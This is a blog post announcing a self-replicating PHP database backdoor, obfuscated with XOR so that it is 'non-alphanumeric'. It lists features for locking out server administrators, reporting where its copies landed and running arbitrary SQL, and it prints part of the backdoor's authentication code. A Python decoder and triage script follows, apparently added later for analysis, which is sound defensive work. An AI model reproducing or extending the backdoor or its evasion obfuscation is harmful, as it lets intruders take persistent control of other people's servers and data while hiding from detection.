Monday, June 16, 2014

Semi-nonalphanumeric & Self-Replicating Database Backdoor/Modifier


Introduction:



This is a release of my latest work. I've written a self-spreading backdoor script for databases with nothing more than symbols (meaning without alpha or numeric values). Currently, it includes only MySQL db servers, but I'll enlarge the scope of its abilities in the near future.

Features Of The Backdoor:



• Self-replication
- copying itself in random directories throughout the server it's been uploaded to
• Authentication for access
- basic authentication system to justify the name of the script
• Restriction of internal REMOTE_ADDRs
- restricting the access of those who handle and manage the server
• Logging and sending out replications' locations
- we do need to know where it has replicated itself in order to access it
• Database browser
- enabling us to view the content and records within the available databases
• Arbitrary SQL execution
- enabling us to modify the content and records within the available databases

Future Features:



• Usage of anonymous functions without a preassigned temporary name - Starfall hit me with this idea
• Self-destruction and remote control
- just for the sake of control
• Complete non-alphanumeric content
- NAN-ing the conditional statements (loops)
• MsSQL, Oracle, PostgreSQL, Sybase, Firebird databases handling
- because we never know what the server is running
• Polymorphic obfuscation class to go through the source and parse it through an obfuscation algorithm
- to make the source harder to read in addition

Construction:



The backdoor consists of two main files: the script itself and the authentication form. Aside from that, the replicated copies have a forced .php extension, of course, and there is an indefinite number of replications. The others are just .txt files for the storage of their locations. The entire backdoor is written in PDO (PHP Data Objects) due to the deprecation of some of the functions for MySQL in PHP5.5+ and security measures. It is semi-nonalphanumeric due to the fact that I have NANed only the MySQL queries in case there is a sort of detection or an IDS. However, the entire authentication system and SQL execution script are completely non-alphanumeric with the exception of foreach() and if() loops. During the process of coding, I have made a separate project to handle my inputs and convert alpha and numeric values to symbols using the XOR operation in PHP. That can be witnessed on my website - http://keeperax.netai.net/Antagonism/NANGenerator.php. There is additional obfuscation within the declaration/definition of variables using Kanji symbols, the Hepburn romanization system and partially alt-codes.

A small preview (part of the authentication system) is presented below:

<?php $_?=(":"^"_").('-'^'_').('-'^'_').("/"^"@").('-'^'_').'_'.('-'^'_').(":"^"_").((','^'~')^'"').("/"^"@").('-'^'_').("+"^"_").("@"^")").("."^"@").(']'^':');$_??=(("."^"`")^"~");$_?($_??);$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");$_=('*'^'_').(','^'_').(":"^"_").('-'^'_').("."^"@").(">"^"_").('-'^'@').(":"^"_");$___=('*'^'_').(','^'_').(":"^"_").('-'^'_');$____=((','^'~')^'"').(">"^"_").(','^'_').(','^'_');$_=${$__}[$___];$__=${$__}[$____];$_…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.('*'^'_').(','^'_').(':'^'_').('-'^'_').(('-'^'|')^'`');$__…=('='^'_').('>'^'_').('<'^'_').('+'^'@').('$'^'@').('/'^'@').('/'^'@').('-'^'_').'_'.((','^'~')^'"').(">"^"_").(','^'_').(','^'_').(('-'^'|')^'`');$__=("#"^"|").('-'^'~').('%'^'`').('-'^'~').('-'^'~').(')'^'`').(("]"^":")^"(").("."^"`");$__……=("@"^"(").(":"^"_").(">"^"_").("$"^"@").(":"^"_").('-'^'_');$___……=("@"^")").(','^'_').(","^"`").("/"^"@").(']'^':').(']'^':').(":"^"_").("$"^"@");$_•=(','^'_').(":"^"_").(','^'_').(','^'_').("@"^")").("/"^"@").("."^"@").'_'.(','^'_').("+"^"_").(">"^"_").('-'^'_').("+"^"_");$_•();$_••=(","^"`").("/"^"@").('<'^'_').(">"^"_").("+"^"_").("@"^")").("/"^"@").("."^"@").':'." ".('='^'_').(">"^"_").('<'^'_').('+'^'@').("$"^"@").("/"^"@").("/"^"@").('-'^'_').'.'.((','^'~')^'"').("@"^"(").((','^'~')^'"');if(isset($__)&&isset($_)){if($__==$__…&&$_==$_…){$__……($_••);${$__}[$___……] = ("+"^"_").('-'^'_').('*'^'_').(":"^"_");}}?>
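For anyone reviewing a file like this preview, the XOR pairs can be folded statically, without running the PHP. The following is an added example, not code from the original post: it decodes three assignments copied from the preview and flags source that assembles a superglobal name out of XOR pairs. The function names, the `min_pairs` threshold and the flagging rule are assumptions.

```python
import re

# One single-character XOR pair such as ('-'^'_'); nested pairs fold inside-out.
ATOM = re.compile(r"""\(\s*(['"])(.)\1\s*\^\s*(['"])(.)\3\s*\)""", re.S)
SQ, DQ = "'[^']*'", '"[^"]*"'
CHAIN = re.compile(rf"(?:{SQ}|{DQ})(?:\s*\.\s*(?:{SQ}|{DQ}))+")
# PHP superglobals: reaching one through a decoded name, as in ${$__}[$___],
# hides request handling from keyword-based scanners.
SUPERGLOBALS = {"_GET", "_POST", "_REQUEST", "_COOKIE", "_SERVER", "_SESSION"}

def _fold(m):
    c = chr(ord(m.group(2)) ^ ord(m.group(4)))
    q = '"' if c == "'" else "'"   # analysis-only quoting, not valid PHP escaping
    return q + c + q

def decode_xor_strings(src):
    """Fold every XOR pair, then rebuild the concatenated string constants."""
    pairs = 0
    while True:
        src, n = ATOM.subn(_fold, src)
        if n == 0:
            break
        pairs += n
    decoded = []
    for run in CHAIN.finditer(src):
        parts = re.findall(f"{SQ}|{DQ}", run.group(0))
        decoded.append("".join(p[1:-1] for p in parts))
    return pairs, decoded

def triage(src, min_pairs=8):
    """Flag source that builds a superglobal name out of XOR pairs.
    min_pairs is an assumed threshold, not a value from the page."""
    pairs, decoded = decode_xor_strings(src)
    hits = sorted(SUPERGLOBALS.intersection(decoded))
    return {"pairs": pairs, "decoded": decoded, "superglobals": hits,
            "flagged": pairs >= min_pairs and bool(hits)}

# Three assignments copied from the preview on this page.
SAMPLE = r"""
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
$___=('*'^'_').(','^'_').(":"^"_").('-'^'_');
$____=((','^'~')^'"').(">"^"_").(','^'_').(','^'_');
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The regular expressions only cover single-character operands, which is the form the preview uses; multi-character XOR operands or escaped characters would need a real PHP tokenizer.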

Both the backdoor script and the generator of non-alphanumeric values will be handed to all members without exception, free of charge. Note that I will be giving away only the NANed copies of them both, so do not PM me to ask for the 'clean' and plainly readable source.
